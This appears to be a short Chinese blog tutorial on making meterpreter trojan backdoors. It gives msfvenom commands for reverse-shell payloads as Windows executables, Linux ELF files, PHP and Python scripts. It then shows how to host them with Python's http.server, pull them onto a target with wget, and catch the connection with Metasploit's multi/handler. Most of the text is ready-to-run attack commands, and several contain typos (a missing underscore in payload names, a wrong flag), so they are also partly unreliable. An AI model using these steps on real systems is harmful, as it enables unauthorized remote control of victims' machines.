四种常用的meterpreter木马后门

msfvenom

使用msfvenom软件生成木马后门,在目标机上执行后门,在本地机上监听上线。

小提示:maf即是metasploit,venom即是病毒

如果不知道msfvenom怎么用,可以msfvenom -h查看,四种生成后门的命令:

windows可执行程序后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Linux可执行程序后门:msfvenom -p linux/x64/meterpreter/reverse tcp LHOST= LPORT= -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST = LPORT= -f raw > shell.php
python脚本后门:msfvenom -p python/meterpreter/reverse tcp LHOST= LPORT= -f raw > shell.py

http.server

在本地机上生成后门后如何传入目标机器中呢?可以通过Python的http服务:

python3 -m http.server 8888

注意:如果不指定端口号,默认是8000端口

在windows中可以打开浏览器,输入:

172.17.17.128:8888

在linux中可使用wget获取,输入:

wget http://172.17.17.128:8000/shell.elf

目标机开启监听

use exploit/multi/handler
windows:set payload windows/x64/meterpreter/reverse_tcp,linux:set payload linux/x64/meterpreter/reverse_tcp
set lhost 172.17.17.128
set lport 4444

msfvenom查看

上面我们是针对windows来生成了一个木马后门,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:

查看msfvenom支持的格式:msfvenom -l formats
查看msfvenom支持的攻击载荷:msfvenom -I payloads    针对win:msfvenom -l payloads |grep windows
查看msfvenom支持的编码:msfvenom -l encoders
查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options

你可能感兴趣的:(四种常用的meterpreter木马后门)